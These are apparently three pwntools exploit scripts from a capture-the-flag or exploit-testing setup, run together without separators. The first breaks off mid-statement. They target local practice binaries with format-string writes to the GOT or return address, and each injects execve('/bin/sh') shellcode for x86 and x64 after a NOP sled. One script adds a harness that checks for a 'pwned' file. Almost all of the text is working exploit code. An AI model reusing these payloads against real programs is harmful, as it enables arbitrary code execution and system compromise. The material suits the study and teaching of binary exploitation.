# +------------------------------------------------+ # | Atack: Format String GOT Shellcode | # +------------------------------------------------+ # # For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings from pwn import * import time import sf target = process("./Correction-FsGotShellcode-x86") gdb.attach(target) bof_payload = sf.BufferOverflow(arch=32) target.recvuntil("Tell me I was never good enough: ") leak = int(target.recvline().strip(b"\n"), 16) ret_address = leak + (92) fs = sf.WriteFmtStr(arch=32, value=-0x36, address=0x804b2d8, offset=0x4, printed_bytes=0x0, alignment_bytes=0x0, value_base=ret_address, address_base=0) payload = sf.BufferOverflow(arch=32, start=92) payload.add_bytes(92, fs.generate_fmt_str()) payload.add_bytes( 54,
from pwn import * import time import sys import signal import sf target = process("./Correction-CallInput-x86") gdb.attach(target, execute="verify_exploit") bof_payload = sf.BufferOverflow(arch=32) bof_payload.set_input_start(0x0) bof_payload.add_bytes( 0x0, b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" ) bof_payload.set_default_byte(b"\x90") payload = bof_payload.generate_payload() target.sendline(payload) # Exploit Verification starts here 15935728 def handler(signum, frame): raise Exception("Timed out") def check_verification_done(): while True: if os.path.exists("pwned") or os.path.exists("rip"): sys.exit(0)
from pwn import * import os import sf import sys import signal target = process("./chall-test_FmtString-20-x64") gdb.attach(target, execute="verify_exploit") bof_payload = sf.BufferOverflow(arch=64) target.recvuntil("Tell me I was never good enough: ") leak = int(target.recvuntil(b"\n").strip(b"\n"), 16) ret_address = leak + (168) fs = sf.WriteFmtStr(arch=64, value=-0x50, address=0x4033b8, offset=0x6, printed_bytes=0x0, alignment_bytes=0x0, value_base=ret_address, address_base=0) payload = sf.BufferOverflow(arch=64, start=168) payload.add_bytes(168, fs.generate_fmt_str()) payload.add_bytes( 80, b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05" ) target.sendline(payload.generate_payload())